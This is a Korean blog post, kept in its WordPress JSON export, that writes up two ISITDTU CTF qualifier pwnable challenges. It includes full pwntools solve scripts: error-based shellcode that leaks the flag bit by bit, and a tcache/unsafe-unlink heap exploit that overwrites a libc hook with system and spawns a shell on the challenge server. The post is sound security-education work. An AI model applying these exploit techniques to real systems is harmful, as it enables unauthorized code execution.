ISITDTU CTF Quals\uc5d0\uc11c 4\ub4f1\ud574\uc11c \ubcf8\uc120 \uc9c4\ucd9c\uad8c\uc744 \ud68d\ub4dd\ud588\ub2e4.
\n\uadf8 \uae40\uc5d0 \ub77c\uc5c5\uc744 \uc368\uc57c\uaca0\ub2e4.
\n\ub0b4\uac00 \ub300\ud68c\uc5d0\uc11c \ud47c \uac70 + \ud480\uc5c8\ub294\ub370, \uc774\ubbf8 \ud300\uc6d0\uc774 \ud47c \uac70<\/p>\n
void __fastcall main()\n{\n unsigned __int8 *dest; \/\/ [rsp+0h] [rbp-10h]\n\n dest = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL);\n if ( dest == -1LL )\n {\n perror(\"Could not mmap\");\n }\n else\n {\n set_buf();\n memcpy(dest, &unk_202020, 0x27uLL);\n read_buf(dest + 39, 0x46u);\n seccomptools();\n (dest)(dest + 39, 0x46LL);\n }\n}\n<\/code><\/pre>\n\uba54\uc778 \ud568\uc218\uac00 \uc774\ub807\uac8c \uc791\uc131 \ub3fc \uc788\ub294\ub370, \ub0b4\uac00 \uc801\uc740 0x46 \ubc14\uc774\ud2b8\uc758 \uc258\ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ucf1c\uc900\ub2e4.<\/p>\n
\uadfc\ub370 \uc774\uc804\uc5d0 \ubaa8\ub4e0 \ub808\uc9c0\uc2a4\ud130\ub97c \ucd08\uae30\ud654\ud574\uc900\ub2e4.<\/p>\n
\uadf8\ub9ac\uace0 init_array<\/code>\ubd80\ubd84\uc744 \ubcf4\uba74 0xcafe000<\/code>\ubd80\ubd84\uc5d0 \ud50c\ub798\uadf8\ub97c \ub2f4\uace0 \/dev\/urandom<\/code>\uc5d0\uc11c \ubf51\uc544\uc628 \uac12\uc744 8\ubc14\uc774\ud2b8\uc529 xor\ud558\ub294 \uc258\ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ucf1c\uc900\ub2e4.<\/p>\n\uadf8\ub7f0\ub370 \ub531 \ud50c\ub798\uadf8 \ud3ec\ub9f7 ISITDTU{<\/code>\uac00 8\ubc14\uc774\ud2b8\ub77c\uc11c urandom \uac12\uc744 \uac00\uc838\uc62c \uc218 \uc788\ub2e4.<\/p>\n\uadf8 \uc810\uacfc Error based shellcode<\/code>\ub97c \uc774\uc6a9\ud574\uc11c flag\ub97c 1\ube44\ud2b8\uc529 \ubf51\uc544\uc624\uba74 \ub41c\ub2e4.<\/p>\nsolve.py<\/h3>\nfrom pwn import *\nimport time\n# urandom : 0xcafe050\n# flag : 0xcafe000\n\nflag = 'ISITDTU{'\ncontext(arch='amd64')\nfor i in range(8, 0x30):\n word = ''\n for j in range(7, -1, -1):\n shellcode = '''\n go:\n mov rax, 0xcafe000\n what:\n mov rax, [rax] \n mov rbx, 0x7b55544454495349\n xor rax, rbx\n mov r9, rax ; r9 == urandom\n shr r9, %d\n mov rax, 0x%x ; rax == flag\n mov rax, [rax]\n xor rax, r9\n and rax, 0xff\n mov rdi, rax\n shr rdi, %d\n and rdi, 1\n test rdi, rdi\n jnz what\n jmp go\n ''' % ((i % 8) * 8, 0xcafe000 + i, j)\n\n p = remote('209.97.162.170', 2222)\n #p = process('.\/babyshellcode')\n print len(asm(shellcode))\n #pause()\n p.sendline(asm(shellcode))\n try:\n res = p.recvuntil('Seg', timeout=3)\n if 'Seg' in res:\n word += '1'\n print word\n p.close()\n else:\n word += '0'\n print word\n p.close()\n except:\n p.close()\n\n flag += chr(int(word, 2))\n print flag\n<\/code><\/pre>\nFLAG : ISITDTU{y0ur_sh3llc0d3_Sk!LL_s0_g00000d}<\/code><\/p>\niz_heap_lv2<\/h2>\n
\n
\uc774\ubc88 \uc2dc\ud15d \uc774\uc9c0 \ud799\ub958\ub294 \ub2c9\uac12\ud588\ub2e4.<\/p>\n
\u3139\u3147 \uc26c\uc6b4 \ubb38\uc81c\uc600\ub2e4.<\/p>\n
\ud658\uacbd\uc740 18.04\uc600\uace0, \uadf8\ub0e5 \ud3c9\ubc94\ud55c \ud799 \ubb38\uc81c\ucc98\ub7fc \uba54\ub274\uc5d0\uc11c add, delete, view, edit\uba54\ub274 \uc2e4\ud589\ud560 \uc218 \uc788\ub2e4.<\/p>\n
delete<\/h4>\nvoid __cdecl delete()\n{\n int v0; \/\/ [rsp+Ch] [rbp-4h]\n\n printf(\"Enter index: \");\n v0 = read_int();\n if ( v0 < 0 && v0 > 19 )\n {\n puts(\"Invalid index!\");\n exit(0);\n }\n if ( !heap_arr[v0] )\n {\n puts(\"Not found!\");\n exit(0);\n }\n free(heap_arr[v0]);\n heap_arr[v0] = 0LL;\n size_arr[v0] = -1LL;\n}\n<\/code><\/pre>\nread_buf<\/h4>\nvoid __cdecl read_buf(char *a1, int a2)\n{\n read(0, a1, a2);\n if ( a2 )\n a1[a2] = 0;\n}\n<\/code><\/pre>\n\uc774 \ub450 \uacf3\uc5d0\uc11c \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n
delete\ud568\uc218\uc5d0\uc11c\ub294 free\ub41c \ud799\uc744 \ucd08\uae30\ud654\ud574\uc8fc\uc9c0 \uc54a\ub294 \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud568.<\/p>\n
read_buf\ud568\uc218\uc5d0\uc11c\ub294 buf[size]\ub97c NULL\ub85c \ub9cc\ub4e4\uc5b4\uc918\uc11c next chunk\uc758 \uccab \ubc14\uc774\ud2b8\ub97c NULL\ub85c \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4.<\/p>\n
\ub9c8\uce68 \ud799 \uc8fc\uc18c\ub3c4 bss\uc5d0 \uc800\uc7a5\ub418\ub2c8 \uc774 \ub450 \ucde8\uc57d\uc810\uc744 \uc798 \uc5ee\uc5b4\uc11c unsafe unlink<\/code>\ub85c exploit\ud558\uba74 \ub41c\ub2e4.<\/p>\nsolve.py<\/h3>\nfrom pwn import *\n\ne = ELF('.\/iz_heap_lv2')\n#p = process(e.path, env={'LD_PRELOAD':'.\/libc.so.6'})\n#p = remote('165.22.110.249', 4444)\np = remote('165.22.110.249', 4444)\nsla = p.sendlineafter\nsa = p.sendafter\n\ndef add(size, buf):\n sla('Choice: ', '1')\n sla('size: ', str(size)) \n sa('Enter data: ', buf)\n\ndef edit(idx, buf):\n sla('Choice: ', '2')\n sla('index: ', str(idx))\n sa('data: ', buf)\n\ndef free(idx):\n sla('Choice: ', '3')\n sla('index: ', str(idx))\n\ndef show(idx):\n sla('Choice: ', '4')\n sla('index: ', str(idx))\n\nfor i in range(8):\n add(0xf0, 'ipwn')\n#0 ~ 7 index\n\nadd(0xf0, 'ipwn') #8\nfor i in range(8):\n free(i)\n\nfor i in range(7): #6\n add(0xf0, 'ipwn')\n\nadd(0xf0, 'A'*8) #7\nshow(7)\np.recvuntil('Data: ')\nlibc_base = u64((p.recvuntil('\\n')[-7:])[:-1] + '\\x00\\x00') - 0x3ebca0\nsystem = libc_base + 0x4f440\ntarget = libc_base + 0x3ed8e8\nunlink_target = 0x602088\nlog.info('libc_base : 0x%x'%libc_base)\n\nfake_chunk = p64(0)*2\nfake_chunk += p64(unlink_target - 0x18)\nfake_chunk += p64(unlink_target - 0x10)\n\nadd(0xf8, fake_chunk.ljust(0xf0, '\\x00') + p64(0xf0)) # 9\nadd(0xf0, 'ipwn') # 10\nfree(9)\nadd(0xf8, fake_chunk.ljust(0xf0, '\\x00') + p64(0xf0)) #10\n\nfor i in range(8):\n free(i)\n\nfree(10)\nedit(9, p64(0)*3 + p64(target))\nedit(9, p64(system))\n\nadd(0x10, '\/bin\/sh') #0\nfree(0)\np.interactive()\n<\/code><\/pre>\nFLAG : ISITDTU{TcAch3_C4ch3_F1LL1Ng_UnL1NKKKKKK_1Z_h34P_LvTw0}<\/code><\/p>\n\ud6c4\uae30<\/h2>\n
\n
\ub098\uba38\uc9c0\ub3c4 \uc774\uac83\uc800\uac83 \ub3c4\uc640\uc8fc\uace0 \uac19\uc774 \ud480\uace0 \ud588\uc9c0\ub9cc \uc194\ubc84\ub97c \uc190\uc73c\ub85c \uc9e0 \uac74 \uc774\uac70 \ub450 \uac1c \ubfd0\uc774\ub77c\uc11c \uc774\uac83\ub9cc \uc500.<\/p>\n
\uc544 prison\uc740 ICMP\ud130\ub110\ub85c \uc3d8\uace0 \uba38 \ud558\ub294 \uac70\ub77c\ub358\ub370, \uac4d Error based shellcoding\uc73c\ub85c \ud480 \uc218 \uc788\ub2e4.<\/p>\n
\ub098\uba38\uc9c0\ub294 \uae30\uc5b5\uc774 \uc548\ub0a8.<\/p>\n
\uc7ac\ubc0c\uc5c8\ub358 \uc2dc\ud15d\uc774\uc5c8\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"
ISITDTU CTF ISITDTU CTF Quals\uc5d0\uc11c 4\ub4f1\ud574\uc11c \ubcf8\uc120 \uc9c4\ucd9c\uad8c\uc744 \ud68d\ub4dd\ud588\ub2e4. \uadf8 \uae40\uc5d0 \ub77c\uc5c5\uc744 \uc368\uc57c\uaca0\ub2e4. \ub0b4\uac00 \ub300\ud68c\uc5d0\uc11c \ud47c \uac70 + \ud480\uc5c8\ub294\ub370, \uc774\ubbf8 \ud300\uc6d0\uc774 \ud47c \uac70 BabyShellcode void __fastcall main() { unsigned __int8 *dest; \/\/ [rsp+0h] [rbp-10h] dest = mmap(0LL, 0x1000uLL, 7, 34, -1, 0LL); if ( dest == -1LL ) { perror(“Could not mmap”); } else {…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,11],"tags":[],"class_list":["post-369","post","type-post","status-publish","format-standard","hentry","category-http-ipwn-kr-blog-pwnable","category-writep-up"],"_links":{"self":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/369"}],"collection":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/comments?post=369"}],"version-history":[{"count":13,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/369\/revisions"}],"predecessor-version":[{"id":382,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/369\/revisions\/382"}],"wp:attachment":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/media?parent=369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/categories?post=369"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/tags?post=369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}